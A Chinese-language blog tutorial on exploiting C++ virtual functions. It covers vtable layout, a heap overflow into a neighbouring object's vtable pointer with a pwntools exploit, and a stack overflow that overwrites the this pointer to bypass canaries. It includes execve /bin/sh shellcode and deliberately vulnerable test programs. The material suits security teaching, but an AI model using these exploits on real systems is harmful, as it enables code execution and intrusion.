针对c++虚函数的攻击

c++虚函数

对虚函数这个名词有印象，但是完全忘记了干啥用的，所以还是回头来看看c++…

简单的说虚函数就是父类的指针调用子类的函数，大致过程如下图：

Alt

根据上图还是可以比较直观的看到，虚函数调用实际上是通过存储在类实例化后分配的内存区域的“头部”存放了指向虚函数表的指针，调用虚函数时先通过这个虚表指针定位到虚表，然后再取虚表中对应的虚函数指针，完成虚函数调用。虚表指针位于成员变量前面，所以如果想要通过溢出来控制虚表指针，只能通过一个对象(v1)溢出到另一个对象(v2)的“头部”来完成对虚表指针的控制。

大致了解这样一个过程之后，结合代码来分析就更容易理解了。考虑下面代码：

// file： test.cpp
// compile: g++ -g -m32 -o test test.cpp
#include <iostream>
using namespace std;

class test
{
public:
    void set(int m, int n){
        a = m;
        b = n;
    }
    virtual void show1(){
        cout << "virtual function1\n";
    }
    virtual void show2(){
        cout << "virtual function2\n";
    }
private:
    int a,b;
};

int main()
{
    test *t1, *t2;
    t1 = new test();
    t2 = new test();
    t1 -> show1();
    t1 -> set(1,2);
    t1 -> show2();
    cout << "-----------------------------\n";
    t2 -> show1();
    t2 -> set(3,4);
    t2 -> show2();
    return 0;
}

整个代码逻辑很简单：类test有三个成员函数，两个私有成员变量，函数set用作对私有成员变量赋值，show1、show2则被标识为虚函数；main函数中申明test类型的指针变量，并对齐实例化然后分别调用三个函数。

先在ida中看看编译之后的程序，c++的程序查看伪代码阅读性没有c那么友好，不过这里程序简单，我们可以直接看汇编代码，这样也能对整个流程掌握的更准确：

.text:0804868B                 lea     ecx, [esp+4]
.text:0804868F                 and     esp, 0FFFFFFF0h
.text:08048692                 push    dword ptr [ecx-4]
.text:08048695                 push    ebp
.text:08048696                 mov     ebp, esp
.text:08048698                 push    ebx
.text:08048699                 push    ecx
.text:0804869A                 sub     esp, 10h
.text:0804869D                 sub     esp, 0Ch
.text:080486A0                 push    0Ch             ; unsigned int
.text:080486A2                 call    __Znwj          ; operator new(uint)
.text:080486A7                 add     esp, 10h
.text:080486AA                 mov     ebx, eax
.text:080486AC                 mov     dword ptr [ebx], 0
.text:080486B2                 mov     dword ptr [ebx+4], 0
.text:080486B9                 mov     dword ptr [ebx+8], 0
.text:080486C0                 sub     esp, 0Ch
.text:080486C3                 push    ebx             ; this
.text:080486C4                 call    _ZN4testC2Ev    ; test::test(void)
.text:080486C9                 add     esp, 10h
.text:080486CC                 mov     [ebp+t1], ebx
.text:080486CF                 sub     esp, 0Ch
.text:080486D2                 push    0Ch             ; unsigned int
.text:080486D4                 call    __Znwj          ; operator new(uint)
.text:080486D9                 add     esp, 10h
.text:080486DC                 mov     ebx, eax
.text:080486DE                 mov     dword ptr [ebx], 0
.text:080486E4                 mov     dword ptr [ebx+4], 0
.text:080486EB                 mov     dword ptr [ebx+8], 0
.text:080486F2                 sub     esp, 0Ch
.text:080486F5                 push    ebx             ; this
.text:080486F6                 call    _ZN4testC2Ev    ; test::test(void)

汇编代码有些冗长，但却将c++类的基本特性详细的展现了出来，前半段的代码实际上就是类的对象实例化，然后调用构造函数，这个根据ida添加的注释也能很直观的看到。我们把关注点放在构造函数里面：

.text:08048848 ; void __cdecl test::test(test *const this)
.text:08048848                 public _ZN4testC2Ev ; weak
.text:08048848 _ZN4testC2Ev    proc near               ; CODE XREF: main+39↑p
.text:08048848                                         ; main+6B↑p
.text:08048848
.text:08048848 this            = dword ptr  8
.text:08048848
.text:08048848 ; __unwind {
.text:08048848                 push    ebp             ; Alternative name is 'test::test(void)'
.text:08048849                 mov     ebp, esp
.text:0804884B                 mov     edx, offset off_8048930  ; 虚函数表指针
.text:08048850                 mov     eax, [ebp+this]
.text:08048853                 mov     [eax], edx
.text:08048855                 nop
.text:08048856                 pop     ebp
.text:08048857                 retn

可以发现这里实际上就一个操作，将虚表指针放到this指针所指向的区域，这一点在调试的时候可以很明显的看到。接着看虚函数的调用：

.text:080486C0                 sub     esp, 0Ch
.text:080486C3                 push    ebx             ; this
.text:080486C4                 call    _ZN4testC2Ev    ; test::test(void)
.text:080486C9                 add     esp, 10h
.text:080486CC                 mov     [ebp+t1], ebx
......
.text:08048701                 mov     eax, [ebp+t1]    ; 取得虚表指针
.text:08048704                 mov     eax, [eax]   ; 取得虚表地址
.text:08048706                 mov     eax, [eax]   ; 取虚表第一项，即show1的函数指针
.text:08048708                 sub     esp, 0Ch
.text:0804870B                 push    [ebp+t1] ; c++类的成员函数有一个默认参数，即this指针
.text:0804870E                 call    eax  ; 调用虚函数

在构造函数执行完之后ebx寄存器的值存储着this指针，然后调用虚函数时通过先将this指针的值赋值给局部变量t1，然后通过栈上存储的t1得到虚表指针，接着取虚表中的函数指针，完成函数调用。

后面的show2函数调用基本无异：

.text:08048725                 mov     eax, [ebp+t1]
.text:08048728                 mov     eax, [eax]
.text:0804872A                 add     eax, 4   ; 取虚表第二项
.text:0804872D                 mov     eax, [eax]
.text:0804872F                 sub     esp, 0Ch
.text:08048732                 push    [ebp+t1]
.text:08048735                 call    eax

只是这里再取得虚表之后，选择的是第二项(add eax,4)，即show2对应的函数指针。

对于t2过程与t1一致，这里不再详细分析。这里再看一看非虚函数的成员函数set：

.text:08048716                 push    2               ; n
.text:08048718                 push    1               ; m
.text:0804871A                 push    [ebp+t1]        ; this
.text:0804871D                 call    _ZN4test3setEii ; test::set(int,int)

很常规的函数调用，这里也直观的展示了类成员函数的默认参数：this指针。

静态分析完主要的代码逻辑，再通过调试来看看一些细节处的特性。在类完成初始化之后即28行处将程序断下：

Alt

继续运行程序，让其完成对私有成员变量的赋值：

Alt

通过溢出劫持程序执行流程

根据前面的分析，我们知道：

虚函数通过虚表完成调用
类的对象存储在一段连续的内存空间中

所以理论上我们可以通过修改虚表内容来完成程序流程的劫持，但是不幸的是虚表所在的内存区域并不可写：

Alt

但是类对象对应的内存是堆区，这段区域是可写的，所以我们可以来覆写虚表指针完成对程序流程的劫持。因为虚表指针存储在类的成员变量之前，所以这里并不能通过溢出来覆写对象自己本身的虚表指针，但是对象指向的内存区域是连续的，所以我们可以通过对象1的成员变量溢出来修改对象2的数据，进而完成攻击。不过在这之前，我们先尝试直接在代码中显示的修改虚表指针，来验证猜想，考虑下面的代码：

/**
 *  file: V_table.cpp
 *  g++ -z execstack -o Vtable V_table.cpp
 *
 *  The general idea is as follows:
 *      1. add the fake vtable which contains our shellcode's address to the end of shellcode
 *      2. make the ptr of vtable point to the fake vtable
 *      3. call the virtual fuc to execute our shellcode
 *
 *  Before starting, I try to rewrite the vtable derectly in code, but soon I found that we have no permision to rewrite the vtable,
 *  because the vtable are loacted on .text section, it's means this area only can be readed and executed, and it's should be noticed.
 *
 *  The idea of this code comes from the book "0day Security: Software Vulnerability Analysis Technology",
 *  and the original author's code is feasible under windows, here I am modified to apply to linux.
 *
 *  the code executed successfully on ubuntu 16.04 LTS
**/

#include <iostream>
#include <cstring>
using namespace std;

char shellcode[]="\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05\x00\x00\x00\x48\x12\x60\x00";
/**
 *  xor rdi, rdi
 *  push rdi
 *  push rdi
 *  pop rsi
 *  pop rdx
 *  mov rdi, 68732F6E69622F2Fh
 *  shr rdi, 8
 *  push rdi
 *  push rsp
 *  pop rdi
 *  push 3Bh
 *  pop rax
 *  syscall
**/


// define a class which contains virtual functions
class Failwest
{
public:
    char buf[200];
    virtual void test(void)
    {
        cout<<"This is a virtual function!"<<endl;
    }
};
Failwest overflow, *p;

int main(void)
{
    char * p_vtable;
    p_vtable=overflow.buf-8;//point to virtual table
    // p_vtable = overflow
    //reset fake virtual table to 0x00601268
    p_vtable[0]=0x68;
    p_vtable[1]=0x12;
    p_vtable[2]=0x60;
    p_vtable[3]=0x00;
    memcpy(overflow.buf,shellcode,0x24);//set fake virtual function pointer in shellcode
    // actually, 0x0x00601268 is just locate in the end of shellcode,
    // in other words, we fake a virtual table at the end of shellcode which only contain one virtual func pointer
    // and the only one was point to our shellcode
    p=&overflow;
    // call the virtual function to trigger the shellcode
    p->test();
    return 0;
}

代码很简单，大致思路为通过指针显示的修改虚表指针，让其指向伪造的虚表(这里是在shellcode尾部伪造虚表):

p_vtable[0]=0x68;
p_vtable[1]=0x12;
p_vtable[2]=0x60;
p_vtable[3]=0x00;

然后将shellcode赋值到对象overflow对应的内存区域，之后调用虚函数，因为此时虚表指针已经被修改，所以实际上程序会转去执行shellcode：

Alt

所以我们直接修改虚表指针来完成攻击是可行的，接下来看一个溢出的例子：

// file: note.cpp
// compile: g++ -m32 -o note note.cpp
#include <iostream>
#include <cstring>
#include <stdlib.h>
using namespace std;


void menu()
{
    cout << "1. add\n";
    cout << "2. show details\n";
    cout << "3. edit details\n";
    cout << "4. exit\n";
    cout << "Choice>>";
}

void backdoor()
{
    system("/bin/sh");
}

class note
{
public:
    void show();    // show details
    virtual void msg(); // descriptions
    void edit(char *, int, int);    // edit details
private:
    int index;
    char details[20];
};

void note::show()
{
    cout << "index: " << index <<endl;
    cout << "details: " << details <<endl;
}
void note::msg()
{
    cout << "work done.\n";
}
void note::edit(char * buf, int n, int len)
{
    index = n;
    memcpy(details, buf, len);
}

int main()
{
    note *n[10];
    int t(0), max(10), index, len, op;
    char buf[0x20];
    while(1){
        menu();
        if(t < 10){
            cin >> op;
            switch(op){
                case 1:
                    n[t++] = new note();
                    n[t-1] -> msg();
                    break;
                case 2:
                    cout << "gitf: "<< n[0] << endl;
                    cout << "index: ";
                    cin >> index;
                    n[index]->show();
                    break;
                case 3:
                    cout << "index: ";
                    (cin >> index).get();
                    cout << "len: ";
                    (cin >> len).get();
                    cout << "details: ";
                    cin.getline(buf,0x20);
                    n[index]->edit(buf, index, len);
                    n[index]->msg();
                    break;
                default:
                    exit(0);
            }
        }else{
            cout << "too much!!!\n";
            break;
        }
    }
}

这段代码本身存在不少问题，但这里是用作讨论通过溢出来修改虚表指针的，所以其他问题暂且忽略

代码逻辑不再详细说明，和ctf中pwn类型题目无异，其中溢出点在edit函数中，类的私有成员的字符数组长度是20，但是复制进去的长度确实自定义的所以这里存在溢出。此外，代码中还会泄露堆区的地址，所以我们可以实例化两个对象，通过对象1溢出覆写对象2的虚函数表，然后通过对象2调用虚函数完成攻击，exp如下：

from pwn import *
context.update(arch='i386', os='linux', log_level='DEBUG')

p = process('./note')

backdoor = 0x080489ce

# add twice
p.recvuntil('>>')
p.sendline('1')
p.recvuntil('>>')
p.sendline('1')

# leak the address
p.recvuntil('>>')
p.sendline('2')
p.recvuntil('gitf: ')
addr = int(p.recvuntil('\n',drop=True),16)
log.success('addr = %#x', addr)
p.recvuntil('index')
p.sendline('0')


p.recvuntil('>>')
p.sendline('3')
# overfow to rewrite the virtual table point
payload = p32(0) + p32(backdoor) + p32(0)*3 + p32(0x21) + p32(addr+0xc)

p.recvuntil('index')
p.sendline('0')
p.recvuntil('len')
p.sendline(str(len(payload)))
p.recvuntil('details')
# pause()

p.sendline(payload)
# pause()

# call the virtual fucntion to trriger the fake virtual function
p.recvuntil('>>')
p.sendline('3')
# pause()
p.recvuntil('index')
p.sendline('1')
p.recvuntil('len')
p.sendline('4')
p.recvuntil('details')
# pause()
p.sendline('aaaa')  # trash data

# get shell
p.interactive()

利用虚函数绕过canary

通过前面的分析，我们知道可以直接通过溢出来修改虚表指针完成程序流程的劫持，但是忽略了32位程序的特点，即参数通过栈传递，换句话说每次调用函数，this指针都会当作参数被压入栈中，所以this指针在构造函数执行时就在栈中了。所以函数的局部变量溢出是可以覆盖掉这个this指针的值的，所以即使程序开启了canary，我们依旧可以通过覆写this指针在程序检查canary之前完成程序流程的劫持即绕过canary。

考虑下面这段代码：

/**
 *  file: pass-canary.cpp
 *  g++ -m32 -z execstack -o pass-canary pass-canary.cpp
 *
 *  The general idea is as follows:
 *      1. overflow on stack and rewrite the pointer(*this) transfer to func's argument to a fake virtual table
 *      2. make the fake virtual table's first item to point to our shellcode
 *      3. call the virtual fuc to execute our shellcode
 *  notice: we made the fake virtual table as the shellcode's head, so just overwrite the "*this" on stack to point to shellcode's address
 *
 *  The idea of this code comes from the book "0day Security: Software Vulnerability Analysis Technology",
 *  and the original author code is feasible under windows, here I am modified to apply to linux.
 *
 *  the code executed successfully on ubuntu 16.04 LTS
**/

#include <cstring>

// shellcode's addr: 0x804a040
char shellcode[]="\x44\xa0\x04\x08"
    "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
    /**
    * xor ecx, ecx
    * mul ecx
    * mov al, 0Bh
    * push ecx
    * push 68732F2Fh
    * push 6E69622Fh
    * mov ebx, esp
    * int 80h
    **/
    // padding
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x40\xa0\x04\x08"; // set the vtable pointer to point shellcode's header


class Virtual {
public :
    void func(char * src)
    {
        char buf[100];
        strcpy(buf, src);
        bar(); // virtual function call
    }
    virtual void  bar()
    {
        // empty function, just for define a virtual function
    }
};

int main()
{
    Virtual test;
    test.func(shellcode);
    return 0;
}

关于代码的几点说明：

类Virtual有两个成员函数，func中存在明显的栈溢出，bar被申明为虚函数
main函数中调用函数func，然后在func中调用bar函数

我们先在ida中对程序做简要分析，main函数中调用func前，将真正的this指针的地址压入栈中，作为参数传递：

.text:08048599                 push    offset shellcode ; char *
.text:0804859E                 lea     eax, [ebp+var_10]
.text:080485A1                 push    eax             ; this, 这里压入的this指针的地址，而不是this指针本身
.text:080485A2                 call    _ZN7Virtual4funcEPc ; Virtual::func(char *)

在函数func函数开始前，将调用前压入栈中的this指针的地址放到函数栈帧栈顶附近：

.text:080485C8                 push    ebp
.text:080485C9                 mov     ebp, esp
.text:080485CB                 sub     esp, 88h
.text:080485D1                 mov     eax, [ebp+this]  ; 复制this指针
.text:080485D4                 mov     [ebp+var_7C], eax

然后后面调用虚函数时，通过这个指向this的指针，得到this指针，然后就是和文章一开始分析的那样，取虚表地址，取虚函数指针，完成调用：

.text:080485FA                 mov     eax, [ebp+var_7C]    ; 得到虚表指针
.text:080485FD                 mov     eax, [eax]   ; 得到虚表地址
.text:080485FF                 mov     eax, [eax]   ; 得到虚函数指针
.text:08048601                 sub     esp, 0Ch
.text:08048604                 push    [ebp+var_7C]
.text:08048607                 call    eax

注意，这里的this指针是作为参数压入栈中的，它实际上是栈上的一个地址，而这个位置的数据才是真正的this指针，这一点在后面的调试中更直观

现在我们知道的是真正的this指针位于栈中，所以剩下来需要做的事情就是通过溢出来覆写这个this指针。在调用函数func处断下程序：

Alt

然后进入到func函数：

Alt

通过调试可以知道，我们通过在栈上的溢出来覆写this指针的办法是可行的，所以现在我们需要计算偏移然后覆写指针使其执行shellcode就可以了。一切准备就绪之后重新编译程序，运行发现成功打开一个shell(代码中shellcode的效果就打开一个shell)

nop@ubuntu:~/Desktop$ ./pass-canary
$ whoami
nop
$ exit
nop@ubuntu:~/Desktop$

You are welcome to share this blog, so that more people can participate in it. If the images used in the blog infringe your copyright, please contact the author to delete them.

c++虚函数

通过溢出劫持程序执行流程

利用虚函数绕过canary

FEATURED TAGS

FRIENDS